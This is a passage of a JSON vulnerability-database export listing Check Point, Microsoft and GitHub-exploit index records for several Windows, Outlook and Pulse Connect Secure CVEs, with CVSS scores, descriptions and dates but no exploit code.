sensitive information.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Information Disclosure (CVE-2021-31955)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0316", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:34:24", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows NTFS Elevation of Privilege (CVE-2021-31956)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0318", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-03T16:09:29", "description": "An authentication bypass vulnerability exists in Pulse Connect Secure. Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:00:00", "type": "checkpoint_advisories", "title": "Pulse Connect Secure Authentication Bypass (CVE-2021-22893)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2022-04-03T00:00:00", "id": "CPAI-2021-0877", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:39:14", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Elevation of Privilege (CVE-2020-0986)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986"], "modified": "2020-06-16T00:00:00", "id": "CPAI-2020-0521", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-21T18:44:23", "description": "A remote code execution vulnerability exists in Microsoft Outlook. The vulnerability is due to the way that Microsoft Outlook parses specially crafted email messages. Successful exploitation of this vulnerability may result to take control of an affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Outlook Remote Code Execution (CVE-2017-0199)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2022-11-21T00:00:00", "id": "CPAI-2017-0251", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:38:23", "description": "A memory corruption vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2020-1380)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380"], "modified": "2020-08-11T00:00:00", "id": "CPAI-2020-0727", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:34:15", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-1732)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CPAI-2021-0032", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:34:11", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31955", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-17T02:34:11", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31956", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:35:19", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-0986", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:35:24", "description": "A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nExploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.\n\nThe update addresses the vulnerability by correcting the way that Microsoft Office and WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft Office and WordPad will leverage to resolve the identified issue.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-11T07:00:00", "type": "mscve", "title": "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-09-13T07:00:00", "id": "MS:CVE-2017-0199", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:34:29", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-28310", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:31", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-28310.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-27072", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27072", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:35:17", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-08-11T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380"], "modified": "2020-08-11T07:00:00", "id": "MS:CVE-2020-1380", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1380", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:34:47", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-04-06T07:00:00", "id": "MS:CVE-2021-1732", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-29T09:12:19", "description": "# CVE-2021-31955 Windows Kernel Informati...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-26T03:59:38", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2022-04-29T01:39:44", "id": "399B15EF-A742-5722-86D2-59F3580C307B", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-01-16T09:15:22", "description": "Working in WIN10...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-11T16:03:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2023-01-16T07:11:35", "id": "82A7AD32-D5F8-59E5-AC8B-6B99F9E33F64", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-12-18T16:20:07", "description": "# CVE-2021-31956\n\npretty stable exploit on win10 20h2 ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-02T10:35:11", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-12-18T14:15:35", "id": "ACB6F5C0-7366-5D78-A7CE-F7ABD8C63974", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:21:32", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 